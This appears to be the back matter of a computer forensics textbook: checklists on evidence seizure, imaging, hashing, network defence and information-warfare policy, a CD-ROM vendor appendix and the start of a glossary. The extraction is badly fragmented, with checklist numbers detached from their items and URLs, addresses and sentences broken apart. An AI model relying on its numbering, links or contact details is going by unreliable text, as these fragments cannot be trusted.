Provide expert consultation and/or testimony, as required [1]
...
2 Principal Computer Forensic Activities Checklist Form

Principal Computer Forensic Activities Checklist Form
Date: _______________________
The computer forensic specialist should ensure that the following provisional
list of actions for some of the principal computer forensic methods are adhered to (check all tasks completed):
____ 1
...

3
...

5
...

7
...

9
...


Safely seize computer systems and files to avoid contamination and/or interference
...

Safe and noncontaminating copying of disks and other data media
...

Source and review backup and archived files
...

Recover material from swap and cache files
...

Core-dump: Collect an image of the contents of the active memory of a
computer at a particular time
...


Checklists by Chapter

____ 11
...

____ 13
...

____ 15
...

____ 17
...

____ 19
...

____ 21
...


____
____
____
____

23
...

25
...


____ 27
...

29
...

31
...

____ 33
...


749

Review single computers for proper working during relevant period, including service logs, fault records, and the like
...

Review complex computer systems and networks for proper working during
relevant period, including service logs, fault records, and the like
...

Review applications programs for proper working during relevant period,
including service logs, fault records, and the like
...

Identify and review monitoring logs
...

Review access control services—quality and resilience of facilities (hardware
and software, identification/authentication services)
...

Review and assess encryption methods—resilience and implementation
...

Monitor email
...

Use honeypots
...

Review and assess measuring devices and other sources of real evidence, including service logs, fault records, and the like
...

Use purpose-written search programs to examine the contents of a file
...

Examine telecoms devices and location of associated activity logs and other
records perhaps held by third parties
...

Reconstruct complex computer intrusion
...


750
____
____
____
____
____

Computer Forensics, Second Edition

35
...

37
...

39
...

Reconstruct disaster affecting computer-driven machinery or process
...

Reverse compilation of suspect code
...


Chapter 2: Types of Computer Forensics Technology
Table F2
...


____ 2
...

____ 4
...


____ 6
...


Move documentary evidence quickly from the printed or typewritten page
to computer data stored on floppy diskettes, Zip disks, CDs, and computer
hard disk drives
...

Share computer files over the Internet, when tied to the commission of a crime,
(creates a new and novel twist to the rules of evidence and legal jurisdiction)
...
The
evidence needed to prove such computer-related crimes potentially resides
on one or more computer hard disk drives in various geographic locations
...

Such evidence is commonly referred to as computer evidence, but it is not
limited to cases involving computer crimes
...
Computer crimes are specifically defined by
federal and/or state statutes
...


Checklists by Chapter

____ 8
...


____ 10
...


____ 12
...

____ 14
...


751

Make sure ambient data (which is usually beyond the awareness of most
computer users) provides the computer forensics investigator with the element of surprise when computer users are interviewed
...

Make sure your computer investigations rely on evidence that is stored as
data and that the timeline of dates and times of files that were created, modified, and/or last accessed by the computer user are recorded
...

Make sure your computer forensics investigator always considers timelines
of computer usage in all computer-related investigations
...
Computer investigations play an important role in cases involving the theft of company
trade secrets
...
The same is true concerning criminal litigation involving
stock frauds, financial frauds, and embezzlements
...
In the past, documentary evidence used to prove these crimes was exclusively in paper form
...
Financial
fraud investigators have been forced to change the way they do business
...

Make sure your computer investigations involve the analysis of the Windows swap file
...
When such
leads are identified, they can be perfected through the use of computer
forensics text search programs
...


752

Computer Forensics, Second Edition

Chapter 3: Types of Computer Forensics Systems
Table F3
...

2
...

4
...

6
...

8
...

____ 10
...

____ 12
...

____ 14
...

____ 16
...

____ 18
...

20
...

22
...

Have procedures in place to develop your security policy
...

Have procedures in place to deter masqueraders and ensure authenticity
...

Have procedures in place to thwart counterfeiters and forgery to retain integrity
...

Have procedures in place to configure your operating system and network
security
...

Have procedures in place to issue and manage certificates
...

Have procedures in place to identify hacking techniques
...

Have procedures in place to deploy an IDS
...

Have procedures in place to manage your IDS
...

Have procedures in place to support outgoing services through firewall
configuration
...

Have procedures in place to protect internal IP services
...

Have procedures in place to measure risk to avoid disaster
...

24
...

26
...

28
...

30
...

32
...

34
...

36
...

38
...

40
...

42
...

44
...


____ 46
...

____ 48
...

Have procedures in place to be able to manage and document the recovery
...

Have procedures in place to assure the plan and apply document management
...

Have procedures in place to implement PKI
...

Have procedures in place to design wireless network security
...

Have procedures in place to install and deploy wireless network security
...

Have procedures in place to be able to implement satellite encryption
...

Have procedures in place to conduct a privacy-needs audit
...

Have procedures in place to implement an enterprise privacy plan
...

Have procedures in place to manage privacy on the Internet supply chains
...

Have procedures in place to install and deploy ID management
...

Have procedures in place to plan for identity theft protection techniques
...

Have procedures in place to deploy enterprise biometrics solutions
...

Have procedures in place to launch a national cybersecurity awareness and
training program
...
1 Vendor and Forensics Services Types Checklist Form

Vendor and Forensic Services Types Checklist Form
Date: ____________________
The CFS should ensure that the following provisional list of actions for some of
the vendor and forensic services types are adhered to (check all tasks completed):
____ 1
...

____ 3
...

____ 5
...

____ 7
...

____ 9
...

____ 11
...

____ 13
...


Make sure your computer forensics service provides an analysis of computers and data in criminal investigations
...

Make sure your computer forensics service provides an analysis of computers and data in civil litigation
...

Make sure your computer forensics service provides an analysis of the company computers to determine employee activity
...

Make sure your computer forensics service provides reporting in a comprehensive and readily understandable manner
...

Make sure your computer forensics service conducts computer forensics on
both PC and MAC platforms
...

Have procedures in place to employ the latest tools and techniques to recover your data
...

Have procedures in place to allow you to recover even the smallest remaining fragments
...


Checklists by Chapter

____ 15
...


____ 17
...


____ 19
...

Have procedures in place to survey your business and provide guidance for
improving the security of your information
...

Be cognizant of the IP address limitations for determining the possible attribution of the event you are investigating
...

Have procedures in place to investigate the possibility of staffing a professional competitive intelligence cell in your company or sponsoring an assessment of the threat to your company’s systems from a group of
intelligence and information security specialists
...


PART II: COMPUTER FORENSICS EVIDENCE AND CAPTURE
Chapter 5: Data Recovery
Table F5
...

____ 2
...


Make sure you are ready and have procedures in place for disasters like
floods, tornadoes, earthquakes, and terrorism when they strike
...

Perform change accumulation to reduce the number of logs required as
input to the recovery, which saves time at the recovery site
...


756

Computer Forensics, Second Edition

____ 4
...

____ 6
...

____ 8
...

____ 10
...


Evaluate your environment to decide how to handle the change accumulation question/problem in action/task #3
...

Check your assets to make sure they’re ready as part of your plan
...
JCL is tricky, and you need to get it exactly right
...

Clean your RECON data sets
...
When your system is down, can you afford to make
mistakes with this key resource?
Test your plan
...
In the real world, there’s much
more
...

Have procedures in place to deal with issues of increased availability, shrinking expertise, growing complexity, failures of many types, and the costs of
data management and downtime
...
1 Evidence Collection and Data Seizure Checklist Form

Evidence Collection and Data Seizure Checklist Form
Date: ____________________
The CFS should ensure that the following provisional list of actions for evidence collection and data seizure are adhered to (check all tasks completed):
____ 1
...

____ 3
...


Make sure that once you’ve created a master copy of the original data, you
don’t touch it or the original itself—always handle secondary copies
...

Make sure you understand what you are doing, because you have to be able
to account for any changes you made and describe exactly what you did
...

Make sure your plan of action is not based on trial and error
...


Checklists by Chapter

____ 5
...


____ 7
...


____ 9
...


____ 11
...

Always try to collect the most volatile evidence first, because some electronic
evidence is more volatile than others
...

Never, ever shut down a system before you collect the evidence
...
It is even worse than shutting a system down
and should be avoided
...

Any programs you use should be on read-only media (such as a CD-ROM
or a write-protected floppy disk) and should be statically linked
...

Make sure your planning stage takes place prior to any investigator arriving
at the computer crime scene, including two ways to structure a team of investigators
...
It can go a long
way in easing the burden of carrying out a search and seizure
...
1 Duplication and Preservation of Digital Evidence Checklist Form

Duplication and Preservation of Digital Evidence Checklist Form
Date: _________________
The computer forensics specialist should ensure the following are adhered to
(check all tasks completed):
____
____
____
____
____
____
____
____

1
...

3
...

5
...

7
...


Shut down the computer
...

Transport the computer system to a secure location
...

Mathematically authenticate data on all storage devices
...

Make a list of key search words
...


758
____
____
____
____
____
____
____
____
____

Computer Forensics, Second Edition

9
...

11
...

13
...

15
...

17
...

Evaluate unallocated space (erased files)
...

Document file names, dates, and times
...

Evaluate program functionality
...

Retain copies of software used
...


Chapter 8: Computer Image Verification and Authentication
Table F8
...


____ 2
...
To successfully subvert the digital integrity
verification and authentication protocol, it would be necessary to do the following without detection: either in a manner that ensures that the relevant
data block produces the same hash value or that the relevant hash value is
recalculated and inserted into the vault, (1) recalculate all the subsequent
derivative hash values; (2) recalculate and rewrite the relevant encrypted
block; break the seals on the relevant digital integrity verification and authentication floppy disks; and rewrite the data and repair the seals
...
This would require the original DIBS drive; the original
password known only to the copying officer (and encrypted on each cartridge in the series); exact knowledge of the date and time settings within the
computer at the time of the original copy; and either a similarly numbered
tamperproof bag on which the defendant’s signature would be forged, or the
original bag opened and resealed with the new floppy inside
...


____ 4
...


____ 6
...
The digital integrity of the floppy disk
and the physical integrity of the tamperproof bag are, in this case, the arbiters of whether such discrepancies were deliberately manufactured
...
It is, thus, useless for a defendant to destroy his or her floppy disk in the hope that its absence will assist any
challenge to the digital integrity verification and authentication protocol
...

Take steps to make sure security is a higher priority for your company
...
1 Discovery of Electronic Evidence Checklist Form

Discovery of Electronic Evidence Checklist Form
Date: _________________
The computer forensics specialist should ensure the following are adhered to
(check all tasks completed):
____
____
____
____

1
...

3
...


____ 5
...


Do not alter discovered information
...

Document all investigative activities
...

Prepare the electronic means needed to document the search
...


760
____
____
____
____
____
____
____
____

Computer Forensics, Second Edition

7
...

9
...

11
...

13
...


____ 15
...

Back up the information discovery file or files
...

Mathematically authenticate the information discovery file or files
...

Find the MD5 message digest for the original information discovery file or files
...

When forensic work is complete, regenerate the message digest values using
the backups on which work was performed; log these new values alongside
the hashes that were originally generated
...

Briefly compare the physical search and seizure with its logical (data-oriented)
counterpart, information discovery
...
1 Identification of Data Checklist Form

Identification of Data Checklist Form
Date: _________________
The computer forensics specialist should ensure the following are adhered to
(check all tasks completed):
____ 1
...


____ 3
...


Use NTP for security reasons
...
WWV broadcasts time signals over short wave, so this information is
available worldwide
...
GPS relies on accurate timekeeping for calculating position
and movement
...

Remember to have multiple sources
...

(You should disable this service if you’re not using it
...


761

Keeping all your systems synchronized to accurate time is not a luxury
...
If you find yourself
comparing logs from disparate systems, you’ll be exceedingly grateful that
you decided to implement NTP
...
1 Reconstructing Past Events Checklist Form

Reconstructing Past Events Checklist Form
Date: _________________
The computer forensics specialist should ensure the following are adhered to
(check all tasks completed):
____ 1
...

____ 3
...

____ 5
...


____ 7
...
This can be particularly difficult when it comes to computers—clock
drift, delayed reporting, and differing time zones can create confusion in
abundance
...

Record any clock drift and the time zone in use, as you will need this later,
but changing the clock just adds in an extra level of complexity that is best
avoided
...
Log files usually use timestamps to indicate when
an entry was added, and these must be synchronized to make sense
...
You’re not just reconstructing events; you are making a
chain of events that must be accounted for as well
...
Using a common reference point can make things much easier
...

This examination host should be secure, clean (a fresh, hardened install of
the operating system is a good idea), and isolated from any network—you
don’t want it tampered with while you work, and you don’t want to accidentally send something nasty down the line
...


____ 9
...

____ 11
...


____ 13
...


Commence analysis of the backups once the system is available
...

Document everything you do
...

Ensure that what you do is not only repeatable, but that you always get the
same results
...

Make sure you correlate all the evidence you have gathered (which is why accurate timestamps are critical)
...

Include all of the evidence you’ve found when reconstructing the attack—no
matter how small it is, you may miss something if you leave a piece of evidence out
...


Chapter 12: Networks
Table F12
...

____ 2
...

____ 4
...

Apply standard research and analysis techniques to datasets provided by a
company or organization
...

Provide initial datasets, project initiation, and training in network traffic
datasets and analysis techniques
...

____ 6
...

8
...

10
...

12
...

14
...

16
...


____ 18
...

____ 20
...

____ 22
...


____ 24
...

Repeatedly test and verify new visualization techniques and procedures to
ensure that new patterns are, in fact, accurate representations of designated
activities
...

Develop a design methodology for visualizing test data
...

Map data structures to a visualization model
...

Refine a prototype
...

Test live Internet data
...

Produce new visualization techniques to streamline and enhance analysis of
network forensic data
...
The resulting interactive visualization interface will advance the usability of the system, solve
the volumetric problem with analyzing these datasets, and advance the adaptation of the solution in the INFOSEC market
...

Clear the archives after an additional specified time
...

Automatically erase email from the computer system, including backups,
after a short period (15–30 days)
...

Formulate and distribute a statement that the automatic deletion of electronic records will be suspended and steps taken to preserve records in the
event of investigation or litigation
...
All agencies that seize and/or examine digital evidence must do this
...


____ 26
...

____ 28
...

____ 30
...

____ 32
...


____ 34
...


____ 36
...

____ 38
...


Clearly set forth in this SOP document all elements of an agency’s policies
and procedures concerning digital evidence, which must be issued under the
agency’s management authority
...

Make sure the procedures you use are generally accepted in the field or supported by data gathered and recorded in a scientific manner
...

Use hardware and software that is appropriate and effective for the seizure or
examination procedure
...

Make sure all digital evidence is available for review and testimony
...

Be alert
...
Security experts agree that ignorance is the
most detrimental security problem
...
Web sites such as the CERT home page
(http://www
...
org) are excellent places to get current information
...
Many companies will sit on patches rather than
put them to use
...
Smart hackers bank on the negligence of others
...
Although just about any application that uses TCP requires a port, you can minimize exposure by limiting the number of ports
accessible through a firewall
...

Eliminate unused user IDs and change existing passwords
...

Make sure system administrators routinely audit and delete any idle user IDs
...

Avoid the use of simple network management protocol (SNMP) across the
firewall
...

____ 41
...


____ 43
...


____ 45
...

Secure remote access
...
You can learn a
lot by hacking into your own system
...
If you can gain access to your systems
from a workstation outside your network, you can easily test your packetfiltering scheme without any outside exposure
...

Ask a consultant when in doubt
...
Many companies offer security assessment and training services
...

Be sure to eliminate unused user IDs and to avoid provisioning SNMP services through the firewall
...
1 Defensive Strategies for Governments
and Industry Groups Checklist Form

Defensive Strategies for Governments and Industry Groups Checklist Form
Date: _________________
The CFS should ensure that the following provisional list of actions for
preparing for defensive strategies for governments and industry groups are
adhered to (check all tasks completed):
____ 1
...
Who should be in charge in the government? An
immediate and badly needed first step is the assignment of a focal point for
federal government leadership in support of a coordinated U
...
response to
the strategic IW threat
...


____ 3
...


____ 5
...


____ 7
...


coordination of the large number of government organizations involved in
such matters—and the necessary interactions with the Congress—be effectively carried out
...
The Executive Office
should also have the responsibility for close coordination with industry, because the nation’s information infrastructure is being developed almost exclusively by the commercial sector
...

Conduct an immediate risk assessment
...
S
...

List the components of this review
...
In an environment of dynamic change in both cyberspace
threats and vulnerabilities, there is no sound basis for presidential decision
making on strategic IW matters without such a risk assessment
...
In this context, there is
always the hope or the belief that the kind of aggressive response can be delayed while cyberspace gets a chance to evolve robust defenses on its own
...
But it may not, and we’re certainly not there now
...
The appropriate role for government in responding to the strategic IW threat needs to be addressed, recognizing that
this role (certain to be part leadership and part partnership with the domestic sector) will unquestionably evolve
...
In addition to being the performer of certain basic preparedness functions (such as
organizing, equipping, training, and sustaining military forces), the government may play a more productive and efficient role as facilitator and maintainer of some information systems and infrastructure; through policy
mechanisms such as tax breaks to encourage reducing vulnerability and improving recovery and reconstitution capability
...
An important factor is the traditional change in the government’s role as one moves from national defense through public safety toward things that represent the public

Checklists by Chapter

____ 9
...


____ 11
...


____ 13
...


____ 15
...
Clearly, the government’s perceived role in this area will have to be balanced against public perceptions of the loss of civil liberties and the commercial sector’s concern about unwarranted limits on its practices and markets
...
Once an initial risk assessment has
been completed, U
...
national security strategy needs to address preparedness for the threat as identified
...

Create a minimum essential information infrastructure (MEII) as a possible
strategic defensive IW initiative
...
S
...

Maintain the strategic nuclear Minimum Essential Emergency Communications Network (MEECN)
...

At an early date conduct an assessment of the feasibility of an MEII
...

Establish a national military strategy
...
S
...
Because of the emerging theaters
of operation in cyberspace for such contingencies, strategic IW profoundly
reduces the significance of distance with respect to the deployment and use
of weapons
...

Create a plan for a national military strategy
...
Consideration of
these IW features should be accounted for in U
...
national military strategy
...
S
...

Against this difficult projection and assessment situation, there is the everpresent risk that the United States could find itself in a crisis in the near
term, facing the possibility of, or indications of, a strategic IW attack
...


by whom) and whether the U
...
military plan and strategy is vulnerable, a
foot-shuffling “we don’t know” will not be an acceptable answer
...
It must be acknowledged that strategic IW
is a very new concept that is presenting a wholly new set of problems
...


Chapter 14: The Information Warfare Arsenal and Tactics of the Military
Table F14
...


____ 2
...


____ 4
...


Review of the military organization’s mission
...
A few military organizations may find that IW-D adds a mission
or increases the importance of an existing mission
...
New relationships with external organizations
may be required, or perhaps existing relationships may need to be modified
...

Allocate responsibilities
...
Perhaps the responsibility for IW-D is spread out among several individuals
...

Identify which information and systems are critical
...
It is important, given resource constraints, to identify which information and systems (and functions of these systems) are critical and which
are not critical
...
How vulnerable are the information and
systems? What is the specific nature of the vulnerabilities? Answers are

Checklists by Chapter

____ 6
...


____ 8
...


____ 10
...
It needs to
be remembered that vulnerabilities are relative to the threat, the nature of
which is constantly evolving
...

Develop a comprehensive IW-D strategy
...

Develop a plan to manage risks
...

Discuss the issues
...
These discussions will create a greater awareness of the
problem within the military organization and improve the organization’s
ability to meet the challenges associated with IW-D
...
Combating IW is
a long-term proposition
...
A military
organization’s investment strategies need to be reviewed, and investments in
defenses and supporting technologies must be made
...
Some reallocation of resources may be made necessary
by changes in the operating costs associated with introducing new procedures and safeguards
...
1 Information Warfare Arsenal and
Tactics of Terrorists and Rogues Checklist Form

Information Warfare Arsenal and Tactics
of Terrorists and Rogues Checklist Form
Date: _________________
The CFS should ensure that the following provisional list of actions for
preparing for information warfare arsenal and tactics of terrorists and rogues
are adhered to (check all tasks completed):

770

Computer Forensics, Second Edition

____ 1
...

____ 3
...


____ 5
...

____ 7
...


____ 9
...


____ 11
...


____ 13
...

Nations developing information strategies should consider investment, both
intellectually and financially, across the gamut of information operations
...
In an era when terrorism may take place across the
globe and sponsors may cross national and regional lines, the global sight and
reach of Air Force assets should be valuable to national decision makers
...
S
...
They can, however, play an important role in
intelligence and covert action
...
The same instruments may be used in parallel against terrorist supporters, terrorist infrastructure and networks, and terrorists themselves
...

Deterrence and response should probably evolve in the direction of a more
“personalized” approach emphasizing the monitoring and attack of key
nodes in terrorist networks and the forcible apprehension of individual terrorist suspects
...

Air and space power should help make terrorism—an increasingly amorphous phenomenon—more transparent
...

As terrorism becomes more diffuse and its sponsorship increasingly hazy,
finding the “smoking gun” should become more difficult but essential to
building a consensus for action
...

Counterterrorism should increasingly focus on urban areas and thus face
strong operational constraints
...
The use of air power for counterterror, therefore, faces the more

Checklists by Chapter

____ 14
...

The value of air power here should depend on its capacity for discriminate
targeting and less-than-lethal technologies
...
1 Information Warfare Arsenal and Tactics of
Private Companies Checklist Form

Information Warfare Arsenal and Tactics of
Private Companies Checklist Form
Date: _________________
The CFS should ensure that the following provisional list of actions for
preparing for information warfare arsenal and tactics of private companies
are adhered to (check all tasks completed):
____ 1
...


____ 3
...


It is recommended that, traditionally, private companies be organized in a
hierarchical way and also be viewed as such
...
Once within the structure, movement up to the
pinnacle of command is meant to be within certain set parameters, and deviation from these parameters is not encouraged
...
Flat management
does not allow for free ingress from the outside as one of its goals—it may
allow for more points of contact between points inside the structure and
outside, but these are monitored and controlled
...
All of these concentric defenses should repeat the pattern of controlled
and protected points of ingress and egress
...


772

Computer Forensics, Second Edition

____ 5
...

____ 7
...


____ 9
...


Corporate entities should have new points of ingress (such as telephony and
Internet access points)—consumers demand it
...

Attention should also be paid to points of egress
...

A hierarchical corporation, based on a fortress structure, may be vulnerable
if an information flow is disrupted
...
The entity may be hard put to
regroup and function without great delay
...
Diversified information and command lines
should be called into action and utilized should one line be cut
...
This does not mean to say that a
corporation should abandon all controls of ingress and egress, and open its
doors to the world
...
This
discussion highlights the first primary step in risk management—identification
...
A simple treatment
of defensive structures may not be wise, because the chaotic nature of the information network and the development of new technologies will inevitably
mean that new forms of attacks and new holes in the armor will always open,
often in unexpected places
...


Chapter 17: The Information Warfare Arsenal of the Future
Table F17
...


____ 2
...


____ 4
...


____ 6
...
Going a stage further and attacking the NII can certainly be an attractive option for substate groups
...
More technology-savvy groups
such as environmental protesters may be the first to use offensive IW techniques but they will have limited aims and not pose a national security
threat
...

Institute a review of national vulnerabilities to an IW arsenal of the future
...
In the past, states have tended to react to changing terrorist
threats rather than preempting them, and the substate group usually retains
the initiative
...
As yet, though,
there has not been national leadership of the sort provided by the White
House and the Congress
...
Performing a holistic assessment of national
vulnerabilities and creating a rigorously enforced information assurance program can meet this new threat
...
For once, the British government, in conjunction with its European
partners, has the opportunity of staying ahead of an emerging threat from
terrorist and other substate groups
...

Conduct strategic IW campaigns
...
Clearly, such
weapons are potent force multipliers in conducting a conventional war, particularly when applied to electronic combat, offensive counterair (OCA),
and strategic air attack operations
...
The massed use of such IW
weapons would provide a decisive advantage to any nation with the capability to effectively target and deliver them
...

Commit to strategic IW campaigns
...


____ 8
...


____ 10
...

____ 12
...
Western governments
have been traditionally reluctant to commit to strategic campaigns, as the
expectation of a lengthy and costly battle, with mass media coverage of its
highly visible results, will quickly produce domestic political pressure to
cease the conflict
...
In this strategy, an opponent who
threatens escalation to a full-scale war is preemptively attacked with electromagnetic weapons to gain command of the electromagnetic spectrum and
command of the air
...
Should
these fail to produce results, more targets may be disabled by electromagnetic attack
...
Air and sea blockades are
complementary means via which pressure may be applied
...
Because electromagnetic
weapons can cause damage on a large scale very quickly, the rate at which
damage can be inflicted can be very rapid, in which respect such a campaign
will differ from the conventional, where the rate at which damage is inflicted
is limited by the usable sortie rate of strategic air attack capable assets
...
Should
blockade and the total disabling of vital economic assets fail to yield results,
these may then be systematically reduced by conventional weapons, to further escalate the pressure
...

Use the strategy of graduated response
...
Again, the strategy of graduated response, using electromagnetic
bombs in the initial phases, would place the government under significant
pressure to concede
...

Do not use advanced nanotechnology to build small self-replicating machines that can feed on organic matter—a bit like bacteria but much more
versatile, and potentially more destructive than the H-bomb
...
1 Surveillance Tools for Information Warfare
of the Future Checklist Form

Surveillance Tools for Information
Warfare of the Future Checklist Form
Date: _________________
The computer forensics specialist should ensure the following actions are adhered to (check all tasks completed):
____ 1
...


____ 3
...

____ 5
...

____ 7
...

____ 9
...

____ 11
...
As a punitive weapon, electromagnetic devices
are attractive for dealing with belligerent governments
...

Use cookies wisely and visitors will appreciate their value
...
It’s up you to help keep cookies from being the most unpalatable junk food on the Web
...
There really is no solution to being able to track Word documents using Web bugs
...

Do not disable Web browser cookies inside of Word documents
...
zonelabs
...
jsp) to warn about Web bugs in Word documents
...
ZoneAlarm is designed to catch trojan horses and spyware
...

The data to be mined should have a direct connection to the goal task, and
the new information should be directly applicable to the task situation
...
Think first about what kind of information is
needed and how it will be used
...

Consider alternative data sources
...

Alter the objectives if no additional data can be obtained and the existing
data is inadequate for the original task specification
...
1 Civilian Casualties: The Victims and Refugees of
Information Warfare Checklist Form

Civilian Casualties: The Victims and Refugees
of Information Warfare Checklist Form
Date: _________________
The computer forensics specialist should ensure the following actions are adhered to (check all tasks completed):
____ 1
...

____ 3
...

____ 5
...

____ 7
...


____ 9
...


Make sure that general or centralized monitoring of communications are
not a chief or central component of the government’s response to computer
security
...

Reject the authority for increased monitoring of information systems
...

Limit the role of the FBI and the NSA in computer security: it has been
demonstrated that their surveillance agendas trump their protective missions, and their activities are often so cloaked in secrecy as to generate understandable suspicion
...

There should be established within the executive branch appropriate mechanisms for oversight of computer security issues, involving both industry
representatives and privacy advocates
...

Limit the government’s role in private sector infrastructure protection, even
though the cyber masses acknowledge the need for government participation, especially in educating society about what is at stake
...


Checklists by Chapter

777

PART V: ADVANCED COMPUTER FORENSICS SYSTEMS
AND FUTURE DIRECTIONS
Chapter 20: Advanced Computer Forensics
Table F20
...

____ 2
...

____ 4
...

____ 6
...

____ 8
...

10
...

12
...

14
...

16
...

18
...


Install patches
...

If a networked computer is shared, make sure it receives the same security
updates as other systems
...

Perform frequent security audits, including trying to gain access using easily available hacking tools
...

Make sure your gateway to the Internet is a system without any important
company data or a hardware solution backed up by a firewall
...

Regularly test the security yourself; then you know what to find solutions for
...

Require every person logging-on to use a password
...

Back up all systems weekly
...

Always have a current copy of the backup tape stored remotely
...

Rotate backup tapes—don’t use the same one over and over again
...

Keep servers in a secured area
...

____ 21
...

____ 23
...

____ 25
...

____ 27
...


____ 29
...

____ 31
...

____ 33
...

____ 35
...

____ 37
...

____ 39
...

Use intrusion detection software that alerts you when you are being hit
...

Have an information security department (at least one person and then one
other for every 1,000 users) that is separate from the IT department and reports directly to the chief information officer
...

Train information security personnel to be aware of any employee who
shows signs of being troubled or disgruntled, particularly if that employee
holds an information-critical position
...

Monitor the network—set up software that will alert you if someone is
working in a different part of the network or at a different time than usual
...

Make sure the person in charge of the system is not the same person in
charge of the backup
...

Make sure critical IT workers are bonded
...

Verify that your backup tapes are where they should be; make sure the information has been saved correctly and the tape is functioning properly
...

Lock down every system that a terminated employee had access to on the
day of termination
...

Go up on the system and check user names and passwords, looking for anything unusual
...

Lock down all the inside doors, such as the file servers, application servers,
and mail servers
...

____ 41
...

____ 43
...

Make sure there aren’t any known vulnerabilities that haven’t been
patched—the administrator could have left those holes behind so he could
get back in
...

Set a trip wire—software that alerts the administrator to system anomalies,
such as the size of a file changing
...
#10-143, Incline Village, NV 89451, 2004 [The
Computer Forensics Expert Witness Network, 472 Scenic Drive, Ashland,
OR 97520, 2004]
...
All rights reserved),
2001
...

Figures: All of the figures from the book, in folders by chapter
...


SYSTEM REQUIREMENTS
Please visit the developer Web sites listed in this appendix for exact system requirements, FAQs, updates, ordering information, licenses, and links to other
tools and sources
...
0 or higher, Windows 2000, XP, and
2003 and WinZip, as well as an Internet connection; some also require basic hardware such as: Firewire, USB devices, Zip, Jaz, floppy diskettes, or hard disk drives
(IDE, EIDE, SCSI, ATA, SATA)
...

The information contained on the CD-ROM is the property of the respective
developers
...
Inquiries regarding
the software contained on the CD-ROM should be directed to the developers of the
products
...
The developers in this appendix and CD-ROM are listed in alphabetical
781

782

Computer Forensics, Second Edition

order, followed by a list of software products and documentation
...

Also, a number of the companies’ contributions include large numbers of support files which are not meant to be opened directly by the user (for example, LC
Technology, ManTech Security & Mission Assurance and New Technologies,
Inc
...
The filename and/or the entire folder (if all the
files can be opened by the user) have been added after the product name, and all
other files in that folder are support files and not meant to be opened by the user
...
txt) that accompany each developer file
and folder
...
Just read and follow the instructions carefully before accessing
any
...

ACR Data Recovery, Inc
...
atl-datarecovery
...
They also offer software for do-it-yourself recovery situations
...

1749 Dexter Avenue North, Seattle, Washington 98109
Products (documents/presentations):
Discovery of Databases in Litigation, Instant Messenger Programs, Ten
Steps to Successful Computer Discovery, Ten Ways to Torpedo Your Data
Discovery Expert
Phone: 206-324-6232
Fax: 206-322-7318
email: cfinc@forensics
...
forensics
...
offers services in electronic discovery, forensic analysis,
expert witness services, and risk control programs for companies
...
computerforensiclabsinc
...

CyberEvidence
5 Grogan’s Park, Suite 211, The Woodlands, TX 77380
Products (documents/presentations):
Articles, Online training manuals and presentations, Newsletters
Phone: 281-296-0465
http: //www
...
com
CyberEvidence, Inc
...
The computer forensics training classes run all year and are available
for both the novice and the advanced investigator
...

CY4OR
Northern office:
CY4OR Limited, 116a Bury New Road, Whitefield, Manchester, M45 6AD
Phone: 0161-767-8123
Fax: 0161-766-2225
Southern Office:
CY4OR Limited, 7 Midshires Business Park, Smeaton Close, Aylesbury,
Bucks, HP19 8HL

784

Computer Forensics, Second Edition

Products (documents/presentations):
Are You Sitting Next to a Criminal?
Phone: 01296-488123
Fax: 01296-488124
http://www
...
co
...

Digital Mountain, Inc
...
com; http://www
...
com
Digital Mountain is a provider of computer forensics, electronic discovery, network forensics, and electronic management services on a national basis
...

e-fense, Inc
...
Saint Asaph St
...
e-fense
...
is a certified computer forensic professionals firm that offers computer forensics, network security, and electronic discovery
...


About the CD-ROM

785

eMag Solutions
3495 Piedmont Road, Eleven Piedmont Center, Suite 500,
Atlanta, GA 30305
Products (documents/presentations):
Data recovery, Electronic discovery, Exchange server data recovery, Facts
about tape, MMPC, MMTMS, Novell GroupWise data recovery, Optical
conversion recovery
Phone: 800-364-9838; 404-995-6060
Fax: 800-334-8273; 404-872-8247
http://www
...
com/
Based in the U
...
and U
...
, eMag provides computer forensic software and
services
...

53 W
...
forensicon
...
, provides top-notch assistance to law firms and corporations
nationwide in expert computer forensics and electronic discovery services
...
, Second Floor, Pasadena, CA 91101
Products (documents/presentations):
Career Track Program, Corporate, eDiscovery Services, EnCase Enterprise,
EnCase Forensic, EnCase Snapshot, EnCase Legal Journal, EnCE Certification, FastBloc, litigation support, professional services, PSD-IR Program,
training option programs and training
Phone: 626-229-9191
Fax: 626-229-9199
http://www
...
com/

786

Computer Forensics, Second Edition

Guidance Software’s Professional Services Division offers expertise in computer
forensics and enterprise investigations
...

Kroll Ontrack Inc
...
M
...
M
...
krollontrack
...

LC Technology International Inc
...
, Suite 203, Clearwater, FL 33761
Products (software):
LC Technology's Forensic Utility Suite: FPRO-DEMO Folder (recovery_
demo
...
html, FPROlicense
...
exe,help\English\index
...
txt), PR3-DEMO
(PRGUIDemo
...
exe,PR-license
...
exe
...
com
Support: Support @ LC-Tech
...
com
Training: Training @ LC-Tech
...
com
Press: Press @ LC-Tech
...
com
http://www
...
co
...
, Japan, 6-13-11, Mikuni BLDG
...
amij
...

ManTech Security & Mission Assurance
12015 Lee Jackson Hwy, Fairfax, VA 22033
Products (software):
NwReader/Setup
...
mantech-ist
...

New Technologies, Inc
...
exe, NTA 60
...
pdf, ntasusb
...
pdf) and a
copy of the NTA Viewer program (NTAVIEW
...
pdf)
Phone: 503-661-6912
Email: info@forensics-intl
...
forensics-intl
...
secure-data
...
dataforensics
...
works primarily with large companies and government
agencies in the field of forensic consultation, training, and risk assessment
...
Wacker Dr
...
projectleadership
...

Renew Data
9500 Arboretum Blvd
...
renewdata
...

Total Recall (BinaryBiz North America)
700 Ken Pratt Blvd
...
zip is a support file and you are not meant to run it directly
...
binarybiz
...
They count over 80,000 successful recoveries
...
vogon-international
...
K
...
S
...

They also have a forensic and investigative department for all sorts of forensic services and training
...
Reports produced by
their investigation service comply with legal requirements for admissibility in court,
and they can provide expert witnesses to give evidence
...
This publication has (at times)
been considered the premier hacker print
product
...

Abuse of privilege
Formal nomenclature for user action not in
accordance with organizational policy or law
...

Acceptable level of risk
A judicious and carefully considered assessment
by the appropriate authority that a computing
activity or network meets the minimum requirements of applicable security directives
...

Acceptable use policy (AUP)
DoD nomenclature for documented standards
or guidance on usage of information systems
and networked assets
...

With accountability, violations or attempted
violations of system security can be traced to
individuals who can then be held responsible
...

Accuracy protects against forgery or tampering
...

Acme of skill
To subdue an adversary without killing him
...

Adapter
A device that serves as an interface between the
system unit and a device attached to it, such as a
SCSI Adapter
...
Can also refer to a special
type of connector
...

Ambient data
This is a forensic term that describes, in general
terms, data stored in nontraditional computer
storage areas and formats
...
The term is now
